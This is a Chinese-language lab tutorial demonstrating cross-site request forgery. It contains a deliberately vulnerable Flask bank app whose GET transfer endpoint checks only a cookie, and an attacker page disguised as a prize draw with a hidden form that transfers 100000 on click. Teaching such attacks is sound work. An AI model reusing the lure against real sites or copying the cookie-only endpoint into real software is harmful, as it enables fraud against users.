目录结构
flask_test
|__templates(它包含bank_page.html和page_attack.html)
|__bank.py
|__csrf_attack.py
bank.py
from flask import render_template, Flask, request, jsonify, make_response
app = Flask("haha")
YOUR_BANK_ACOUNT = 1000000000
TOKEN = "0ofjsfnnfgxgxgxgreituto"
@app.route("/")
def root():
response = make_response(render_template("bank_page.html"))
#简单设置cookie
response.set_cookie("token", TOKEN)
return response
@app.route("/quit")
def quit():
response = make_response("退出成功!")
response.delete_cookie("token")
return response
@app.route("/transfer_money")
def form():
# 简单验证cookie
if TOKEN != request.cookies.get("token"):
print("正遭受攻击!")
return jsonify({"status": "Fail"})
global YOUR_BANK_ACOUNT
cash = int(request.values.get("money"))
YOUR_BANK_ACOUNT -= cash
print(f"Transfer {cash} yuan, YOUR_BANK_COUNT left {YOUR_BANK_ACOUNT}")
return jsonify({"status": "OK"})
if __name__ == "__main__":
app.run(port=8082)
bank_page.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>main</title>
</head>
<body>
<h1>账户转移!</h1>
<form action="/transfer_money">
transfer_money:<br>
<input type="text" name="money" value="0">
<br>
<br><br>
<input type="submit" value="Submit">
</form>
点击下面链接退出<br>
<a href="quit">quit</a>
</body>
</html>
以下是攻击网站代码
csrf_attack.py
from flask import render_template, Flask, request, jsonify
app = Flask("haha")
G_COUNT = 10000
@app.route("/")
def root():
return render_template("page_attack.html")
if __name__ == "__main__":
app.run(port=8083)
page_attack.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>main</title>
</head>
<body>
<h1>抽大奖!</h1>
<form action="http://127.0.0.1:8082/transfer_money">
<input type="hidden" name="money" value="100000">
<input type="submit" value="点我抽大奖">
</form>
</body>
</html>
演示步骤:
1.分别运行两个py文件,启动两个web服务器
(以下均在一个浏览器中打开)
2.先访问"http://127.0.0.1:8083/"页面,点击抽大奖按钮,发现返回false,因为没有携带cookie,所以校验不通过!攻击失败!根因是未登陆bank页面,所以没有浏览器中没有相关cookie
3.访问"http://127.0.0.1:8082/"页面,此时浏览器中会存储相关cookie,此时再重复动作2,发现攻击成功!
4.在bank页面点击退出链接,此时再重复动作2,发现攻击失败!原因同2